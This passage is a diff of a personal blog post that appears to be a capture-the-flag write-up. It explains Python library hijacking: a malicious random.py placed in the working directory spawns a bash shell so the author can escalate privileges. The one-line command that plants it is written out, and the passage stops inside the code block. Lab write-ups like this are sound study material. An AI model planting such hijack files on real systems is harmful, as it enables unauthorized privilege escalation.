0x00Jeff/0x00Jeff.github.io/_posts/2014-3-3-Hello-World.md

     <ol> python tries to find imported libraries in the current working directory before looking for them somewhere else, knowing this we can make a malicious `random.py` to elevate priveleges </ol>
 </li>

-of course, it's so obvious, *if* I had known those info before
+of course, it's so obvious, *if* I had known those informations before

 ```bash
 alice@wonderland:~$ echo 'import pty;pty.spawn("/bin/bash")' > random.py